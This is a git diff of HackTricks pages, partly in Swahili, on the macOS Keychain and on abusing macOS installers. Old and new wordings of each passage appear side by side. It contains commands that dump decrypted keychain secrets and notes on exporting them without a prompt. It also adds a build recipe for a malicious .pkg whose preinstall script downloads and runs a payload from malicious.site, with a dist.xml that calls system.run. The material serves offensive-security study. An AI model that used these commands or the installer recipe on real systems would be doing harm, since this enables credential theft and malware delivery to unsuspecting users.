* Ikiwa **apple** imetajwa, basi programu inahitaji kuwa **imesainiwa** na **Apple**.
* Ikiwa **cdhash** imeonyeshwa, basi **programu** lazima iwe na **cdhash** maalum.
* Ikiwa **teamid** imeainishwa, basi ili **kupata thamani ya ingizo** **bila** **kuombwa** programu iliyotumika lazima iwe na **teamid sawa**.
* Ikiwa **apple** imeainishwa, basi programu inahitaji kuwa **imedhaminiwa** na **Apple**.
* Ikiwa **cdhash** imeainishwa, basi **programu** lazima iwe na **cdhash** maalum.
### Kuunda Kuingilio cha Keychain
### Creating a Keychain Entry
Wakati kuingilio **mpya** kinachoundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
Wakati **ingizo jipya** linaundwa kwa kutumia **`Keychain Access.app`**, sheria zifuatazo zinatumika:
* Programu zote zinaweza kufanya usimbaji.
* **Hakuna programu** inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **PartitionID** inawekwa kuwa **`apple`**.
* Programu zote zinaweza kuficha.
* **Hakuna programu** zinaweza kusafirisha/kufungua (bila kuombwa mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uaminifu.
* Hakuna programu zinaweza kubadilisha ACLs.
* **partitionID** imewekwa kuwa **`apple`**.
Wakati **programu inaunda kuingilio katika keychain**, sheria ni tofauti kidogo:
Wakati **programu inaunda ingizo katika keychain**, sheria ni tofauti kidogo:
* Programu zote zinaweza kufanya usimbaji.
* Ni **programu inayounda** (au programu nyingine yoyote iliyowekwa wazi) inaweza kuuza/kufuli (bila kuuliza mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uadilifu.
* Hakuna programu inaweza kubadilisha ACLs.
* **PartitionID** inawekwa kuwa **`teamid:[teamID hapa]`**.
* Programu zote zinaweza kuficha.
* Ni **programu inayounda** pekee (au programu nyingine yoyote iliyoongezwa wazi) zinaweza kusafirisha/kufungua (bila kuombwa mtumiaji).
* Programu zote zinaweza kuona ukaguzi wa uaminifu.
* Hakuna programu zinaweza kubadilisha ACLs.
* **partitionID** imewekwa kuwa **`teamid:[teamID hapa]`**.
## Kupata Ufikiaji wa Keychain
## Accessing the Keychain
### `usalama`
### `security`
```bash
# List keychains
security list-keychains
# Dump all metadata and decrypted secrets (a lot of pop-ups)
security dump-keychain -a -d
@ -90,60 +93,63 @@ security find-generic-password -a "Slack" -g
# Change the specified entrys PartitionID entry
security set-generic-password-parition-list -s "test service" -a "test acount" -S
# Dump specifically the user keychain
security dump-keychain ~/Library/Keychains/login.keychain-db
```
### APIs
{% hint style="success" %}
**Uorodheshaji na kudondosha** ya siri ambazo **hazitazalisha ombi** linaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
Utaratibu wa **keychain** na kutolewa kwa siri ambazo **hazitazalisha ujumbe** zinaweza kufanywa kwa kutumia chombo [**LockSmith**](https://github.com/its-a-feature/LockSmith)
{% endhint %}
Pata na ujue **taarifa** kuhusu kila kuingia kwenye keychain:
Orodhesha na pata **info** kuhusu kila kiingilio cha keychain:
* API ya **`SecItemCopyMatching`** hutoa taarifa kuhusu kila kuingia na kuna sifa unazoweza kuweka unapotumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufichua data (weka kama uongo ili kuepuka pop-ups)
* **`kSecReturnRef`**: Pata pia kumbukumbu ya kipengee cha keychain (weka kama kweli kwa kesi utaona unaweza kufichua bila pop-up)
* **`kSecReturnAttributes`**: Pata maelezo kuhusu kuingia
* **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudi
* **`kSecClass`**: Aina gani ya kuingia kwenye keychain
* API **`SecItemCopyMatching`** inatoa info kuhusu kila kiingilio na kuna baadhi ya sifa unaweza kuweka unapoitumia:
* **`kSecReturnData`**: Ikiwa ni kweli, itajaribu kufungua data (weka kuwa uongo ili kuepuka pop-up zinazoweza kutokea)
* **`kSecReturnRef`**: Pata pia rejea kwa kipengee cha keychain (weka kuwa kweli ikiwa baadaye utaona unaweza kufungua bila pop-up)
* **`kSecReturnAttributes`**: Pata metadata kuhusu viingilio
* **`kSecMatchLimit`**: Ni matokeo mangapi ya kurudisha
* **`kSecClass`**: Ni aina gani ya kiingilio cha keychain
Pata **ACLs** ya kila kuingia:
Pata **ACLs** za kila kiingilio:
* Kwa API ya **`SecAccessCopyACLList`** unaweza kupata **ACL ya kipengee cha keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na zingine zilizotajwa awali) ambapo kila orodha ina:
* Kwa API **`SecAccessCopyACLList`** unaweza kupata **ACL kwa kipengee cha keychain**, na itarudisha orodha ya ACLs (kama `ACLAuhtorizationExportClear` na wengine waliotajwa hapo awali) ambapo kila orodha ina:
* Maelezo
* **Orodha ya Maombi Yaliyoaminika**. Hii inaweza kuwa:
* **Orodha ya Maombi ya Kuaminika**. Hii inaweza kuwa:
* Programu: /Applications/Slack.app
* Binary: /usr/libexec/airportd
* Kikundi: group://AirPort
* Kundi: group://AirPort
Ficha data:
Sambaza data:
* API ya **`SecKeychainItemCopyContent`** inapata maandishi wazi
* API ya **`SecItemExport`** inaexport funguo na vyeti lakini inaweza kuhitaji kuweka nywila kuuza yaliyomo yaliyofichwa
* API **`SecKeychainItemCopyContent`** inapata maandiko
* API **`SecItemExport`** inasambaza funguo na vyeti lakini inaweza kuhitaji kuweka nywila ili kusambaza yaliyomo kwa usimbuaji
Na hizi ni **mahitaji** ya kuweza **kuuza siri bila ombi**:
Na haya ndiyo **mahitaji** ya kuwa na uwezo wa **kusambaza siri bila ujumbe**:
* Ikiwa kuna **programu 1 au zaidi** zilizoorodheshwa:
* Unahitaji **idhini sahihi** (**`Nil`**, au kuwa **sehemu** ya orodha iliyoruhusiwa ya programu katika idhini ya kupata taarifa za siri)
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Unahitaji sahihi ya msimbo kulingana na ile ya programu moja **iliyoaminika** (au kuwa mwanachama wa KeychainAccessGroup sahihi)
* Ikiwa **programu zote zinaaminika**:
* Unahitaji **idhini sahihi**
* Unahitaji sahihi ya msimbo kulingana na **PartitionID**
* Ikiwa **hakuna PartitionID**, basi hii haifai
* Ikiwa **1+ maombi ya kuaminika** yameorodheshwa:
* Inahitaji **idhini** sahihi (**`Nil`**, au kuwa **sehemu** ya orodha inayoruhusiwa ya maombi katika idhini ya kufikia info ya siri)
* Inahitaji saini ya msimbo kuendana na **PartitionID**
* Inahitaji saini ya msimbo kuendana na ile ya **programu moja ya kuaminika** (au kuwa mwanachama wa kundi sahihi la KeychainAccessGroup)
* Ikiwa **maombi yote ni ya kuaminika**:
* Inahitaji **idhini** sahihi
* Inahitaji saini ya msimbo kuendana na **PartitionID**
* Ikiwa **hakuna PartitionID**, basi hii haitahitajika
{% hint style="danger" %}
Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo kwenye programu hiyo**.
Hivyo, ikiwa kuna **programu 1 iliyoorodheshwa**, unahitaji **kuingiza msimbo katika programu hiyo**.
Ikiwa **apple** imeonyeshwa kwenye **partitionID**, unaweza kufikia hiyo kwa kutumia **`osascript`** hivyo chochote kinachotumaini programu zote na apple kwenye partitionID. **`Python`** pia inaweza kutumika kwa hili.
Ikiwa **apple** inaonyeshwa katika **partitionID**, unaweza kuipata kwa kutumia **`osascript`** hivyo chochote kinachotegemea maombi yote na apple katika partitionID. **`Python`** inaweza pia kutumika kwa hili.
{% endhint %}
### Vipengele viwili vya ziada
### Sifa mbili za ziada
* **Isiyoweza kuonekana**: Ni bendera ya boolean ya **kuficha** kuingia kutoka kwa programu ya Keychain ya **UI**
* **Jumla**: Ni kuhifadhi **metadata** (kwa hivyo SIYOFICHWA)
* Microsoft ilikuwa inahifadhi katika maandishi wazi vivinjari vyote vya upya kufikia mwisho wa hisia.
* **Invisible**: Ni bendera ya boolean ili **kuficha** kiingilio kutoka kwa programu ya **UI** Keychain
* **General**: Ni kuhifadhi **metadata** (hivyo HAIJASIMBULIWA)
* Microsoft ilikuwa ikihifadhi katika maandiko yote ya refresh tokens ili kufikia mwisho wa nyeti.
## Marejeo
## Marejeleo
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
@ -151,25 +157,25 @@ Ikiwa **apple** imeonyeshwa kwenye **partitionID**, unaweza kufikia hiyo kwa kut
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utafutaji inayotumiwa na **dark-web** inayotoa kazi za **bure** kuangalia ikiwa kampuni au wateja wake wamekuwa **wameathiriwa** na **stealer malwares**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo lao kuu la WhiteIntel ni kupambana na kuchukuliwa kwa akaunti na mashambulizi ya ransomware yanayotokana na malware ya kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
Unaweza kuangalia tovuti yao na kujaribu injini yao kwa **bure** kwenye:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
Jifunze & zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>unga mkono HackTricks</summary>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,35 +1,37 @@
# Matumizi Mabaya ya Wasakinishaji wa macOS
# macOS Installers Abuse
{% hint style="success" %}
Jifunze na zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>unga mkono HackTricks</summary>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi za Pkg
## Pkg Basic Information
**Pakiti ya wasakinishaji wa macOS** (inayojulikana pia kama faili ya `.pkg`) ni muundo wa faili unaotumiwa na macOS kwa **kugawa programu**. Faili hizi ni kama **sanduku linaloleta kila kitu ambacho programu** inahitaji kusakinisha na kukimbia kwa usahihi.
Kifurushi cha **installer** cha macOS (pia kinachojulikana kama faili `.pkg`) ni muundo wa faili unaotumiwa na macOS ku **distribute software**. Faili hizi ni kama **sanduku ambalo lina kila kitu ambacho kipande cha software** kinahitaji ili kufunga na kufanya kazi ipasavyo.
Faili ya pakiti yenyewe ni nyaraka inayoshikilia **mfululizo wa faili na saraka ambazo zitasakinishwa kwenye** kompyuta ya lengo. Inaweza pia kujumuisha **maandishi** kutekeleza kazi kabla na baada ya usakinishaji, kama vile kuweka faili za usanidi au kusafisha toleo za zamani za programu.
Faili la kifurushi lenyewe ni archive inayoshikilia **hierarchy ya faili na directories ambazo zitawekwa kwenye kompyuta ya lengo**. Inaweza pia kujumuisha **scripts** za kutekeleza kazi kabla na baada ya ufungaji, kama vile kuandaa faili za usanidi au kusafisha toleo za zamani za software.
### Mfululizo
### Hierarchy
<figure><img src="../../../.gitbook/assets/Pasted Graphic.png" alt="https://www.youtube.com/watch?v=iASSG0_zobQ"><figcaption></figcaption></figure>
* **Usambazaji (xml)**: Kubinafsisha (jina, maandishi ya karibu...) na maandishi/uchunguzi wa usakinishaji
* **PackageInfo (xml)**: Taarifa, mahitaji ya usakinishaji, mahali pa usakinishaji, njia za maandishi za kukimbia
* **Bili ya vifaa (bom)**: Orodha ya faili za kusakinisha, kuboresha au kuondoa na ruhusa za faili
* **Mzigo (CPIO nyaraka gzip compresses)**: Faili za kusakinisha kwenye `mahali-pa-usakinishaji` kutoka PackageInfo
* **Maandishi (CPIO nyaraka gzip compresses)**: Maandishi kabla na baada ya usakinishaji na rasilimali zaidi zilizochimbuliwa kwenye saraka ya muda kwa utekelezaji.
* **Distribution (xml)**: Marekebisho (kichwa, maandiko ya karibisho…) na ukaguzi wa script/ufungaji
* **PackageInfo (xml)**: Taarifa, mahitaji ya ufungaji, eneo la ufungaji, njia za scripts za kutekeleza
* **Bill of materials (bom)**: Orodha ya faili za kufunga, kuboresha au kuondoa pamoja na ruhusa za faili
* **Payload (CPIO archive gzip compresses)**: Faili za kufunga katika `install-location` kutoka PackageInfo
* **Scripts (CPIO archive gzip compressed)**: Scripts za kabla na baada ya ufungaji na rasilimali zaidi zilizotolewa kwenye directory ya muda kwa ajili ya utekelezaji.
### Decompress
```bash
# Tool to directly get the files inside a package
pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir"
@ -43,60 +45,143 @@ xar -xf "/path/to/package.pkg"
cat Scripts | gzip -dc | cpio -i
cpio -i < Scripts
```
## Maelezo Muhimu ya DMG
In order to visualize the contents of the installer without decompressing it manually you can also use the free tool [**Suspicious Package**](https://mothersruin.com/software/SuspiciousPackage/).
Faili za DMG, au Picha za Diski za Apple, ni muundo wa faili unaotumiwa na macOS ya Apple kwa picha za diski. Faili ya DMG ni msingi wa **picha ya diski inayoweza kufungwa** (ina filesystem yake) ambayo ina data ya block ya ghafi mara nyingi imepakwa na wakati mwingine imefichwa. Unapofungua faili ya DMG, macOS **inaifunga kama vile ingekuwa diski halisi**, kuruhusu kupata yaliyomo yake.
## DMG Basic Information
DMG files, or Apple Disk Images, are a file format used by Apple's macOS for disk images. A DMG file is essentially a **mountable disk image** (it contains its own filesystem) that contains raw block data typically compressed and sometimes encrypted. When you open a DMG file, macOS **mounts it as if it were a physical disk**, allowing you to access its contents.
{% hint style="danger" %}
Tafadhali kumbuka kwamba wasakinishaji wa **`.dmg`** hushikilia **muundo mwingi sana** ambao hapo awali baadhi yao waliokuwa na mapungufu walitumika kupata **utekelezaji wa nambari ya msingi**.
Note that **`.dmg`** installers support **so many formats** that in the past some of them containing vulnerabilities were abused to obtain **kernel code execution**.
{% endhint %}
### Mfumo wa Hierarchy
### Hierarchy
<figure><img src="../../../.gitbook/assets/image (225).png" alt=""><figcaption></figcaption></figure>
Mfumo wa faili ya DMG unaweza kutofautiana kulingana na yaliyomo. Hata hivyo, kwa DMGs za programu, kawaida inafuata muundo huu:
The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure:
* Kiwango cha Juu: Hii ni mzizi wa picha ya diski. Mara nyingi ina programu na labda kiungo kwa folda za Maombi.
* Programu (.app): Hii ni programu halisi. Katika macOS, programu ni kawaida pakiti inayojumuisha faili na folda nyingi zinazounda programu.
* Kiungo cha Maombi: Hii ni mkato kwenda kwa folda za Maombi kwenye macOS. Lengo la hili ni kufanya iwe rahisi kwako kusakinisha programu. Unaweza kuburuta faili ya .app kwenye mkato huu kusakinisha programu.
* Top Level: This is the root of the disk image. It often contains the application and possibly a link to the Applications folder.
* Application (.app): This is the actual application. In macOS, an application is typically a package that contains many individual files and folders that make up the application.
* Applications Link: This is a shortcut to the Applications folder in macOS. The purpose of this is to make it easy for you to install the application. You can drag the .app file to this shortcut to install the app.
## Privesc kupitia unyanyasaji wa pkg
## Privesc via pkg abuse
### Utekelezaji kutoka kwenye folda za umma
### Execution from public directories
Ikiwa scripti ya usakinishaji kabla au baada ya usakinishaji inatekelezwa kwa mfano kutoka **`/var/tmp/Installerutil`**, na mshambuliaji anaweza kudhibiti scripti hiyo ili apande vyeo kila wakati inapotekelezwa. Au mfano mwingine sawa:
If a pre or post installation script is for example executing from **`/var/tmp/Installerutil`**, and attacker could control that script so he escalate privileges whenever it's executed. Or another similar example:
<figure><img src="../../../.gitbook/assets/Pasted Graphic 5.png" alt="https://www.youtube.com/watch?v=iASSG0_zobQ"><figcaption><p><a href="https://www.youtube.com/watch?v=kCXhIYtODBg">https://www.youtube.com/watch?v=kCXhIYtODBg</a></p></figcaption></figure>
### AuthorizationExecuteWithPrivileges
Hii ni [kazi ya umma](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) ambayo wasakinishaji na wakusasisha kadhaa watatumia kutekeleza kitu kama mzizi. Kazi hii inakubali **njia** ya **faili** ya **kutekeleza** kama parameter, hata hivyo, ikiwa mshambuliaji anaweza **kurekebisha** faili hii, ataweza **kunyanyasa** utekelezaji wake na mzizi ili **kupandisha vyeo**.
This is a [public function](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) that several installers and updaters will call to **execute something as root**. This function accepts the **path** of the **file** to **execute** as parameter, however, if an attacker could **modify** this file, he will be able to **abuse** its execution with root to **escalate privileges**.
```bash
# Breakpoint in the function to check wich file is loaded
(lldb) b AuthorizationExecuteWithPrivileges
# You could also check FS events to find this missconfig
```
### Utekelezaji kwa kufunga
For more info check this talk: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw)
Ikiwa mtengenezaji anaandika kwa `/tmp/fixedname/bla/bla`, inawezekana **kuunda mlima** juu ya `/tmp/fixedname` bila wamiliki hivyo unaweza **kurekebisha faili yoyote wakati wa usakinishaji** kwa kudhuru mchakato wa usakinishaji.
### Utekelezaji kwa kupandisha
Mfano wa hii ni **CVE-2021-26089** ambayo ilifanikiwa **kubadilisha skripti ya kipindi** ili kupata utekelezaji kama mtumiaji wa mizizi. Kwa maelezo zaidi angalia mazungumzo: [**OBTS v4.0: "Mlima wa Mende" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
Ikiwa mfunguo anaandika kwenye `/tmp/fixedname/bla/bla`, inawezekana **kuunda mount** juu ya `/tmp/fixedname` bila wamiliki ili uweze **kubadilisha faili yoyote wakati wa ufungaji** ili kutumia mchakato wa ufungaji.
## pkg kama zisizo
Mfano wa hili ni **CVE-2021-26089** ambayo ilifanikiwa **kufuta script ya kawaida** ili kupata utekelezaji kama root. Kwa maelezo zaidi angalia hotuba: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
### Mzigo wa Kufuta
## pkg kama malware
Inawezekana tu kuzalisha faili ya **`.pkg`** na **skripti za kabla na baada ya usakinishaji** bila mzigo wowote.
### Payload Tupu
### JS katika xml ya Usambazaji
Inawezekana tu kuunda **`.pkg`** faili yenye **pre na post-install scripts** bila payload halisi isipokuwa malware ndani ya scripts.
Inawezekana kuongeza vitambulisho vya **`<script>`** katika faili ya **xml ya usambazaji** ya pakiti na msimbo huo utatekelezwa na inaweza **kutekeleza amri** kutumia **`system.run`**:
### JS katika distribution xml
Inawezekana kuongeza **`<script>`** vitambulisho katika **distribution xml** faili ya kifurushi na hiyo code itatekelezwa na inaweza **kutekeleza amri** kwa kutumia **`system.run`**:
<figure><img src="../../../.gitbook/assets/image (1043).png" alt=""><figcaption></figcaption></figure>
## Marejeo
### Mfunguo wa nyuma
* [**DEF CON 27 - Kufungua Pkgs Tazama Ndani ya Pakiti za Usakinishaji wa MacOS na Uvimbe wa Kawaida wa Usalama**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**OBTS v4.0: "Dunia ya Kufunga ya macOS" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
* [**DEF CON 27 - Kufungua Pkgs Tazama Ndani ya Pakiti za Usakinishaji wa MacOS**](https://www.youtube.com/watch?v=kCXhIYtODBg)
Mfunguo mbaya ukitumia script na JS code ndani ya dist.xml
```bash
# Package structure
mkdir -p pkgroot/root/Applications/MyApp
mkdir -p pkgroot/scripts
# Create preinstall scripts
cat > pkgroot/scripts/preinstall <<EOF
#!/bin/bash
echo "Running preinstall script"
curl -o /tmp/payload.sh http://malicious.site/payload.sh
chmod +x /tmp/payload.sh
/tmp/payload.sh
exit 0
EOF
# Build package
pkgbuild --root pkgroot/root --scripts pkgroot/scripts --identifier com.malicious.myapp --version 1.0 myapp.pkg
# Generate the malicious dist.xml
cat > ./dist.xml <<EOF
<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
<title>Malicious Installer</title>
<options customize="allow" require-scripts="false"/>
<script>
<![CDATA[
function installationCheck() {
if (system.isSandboxed()) {
my.result.title = "Cannot install in a sandbox.";
my.result.message = "Please run this installer outside of a sandbox.";
return false;
}
return true;
}
function volumeCheck() {
return true;
}
function preflight() {
system.run("/path/to/preinstall");
}
function postflight() {
system.run("/path/to/postinstall");
}
]]>
</script>
<choices-outline>
<line choice="default">
<line choice="myapp"/>
</line>
</choices-outline>
<choice id="myapp" title="MyApp">
<pkg-ref id="com.malicious.myapp"/>
</choice>
<pkg-ref id="com.malicious.myapp" installKBytes="0" auth="root">#myapp.pkg</pkg-ref>
</installer-gui-script>
EOF
# Buil final
productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg
```
## References
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**OBTS v4.0: "The Wild World of macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
* [**DEF CON 27 - Unpacking Pkgs A Look Inside MacOS Installer Packages**](https://www.youtube.com/watch?v=kCXhIYtODBg)
* [https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}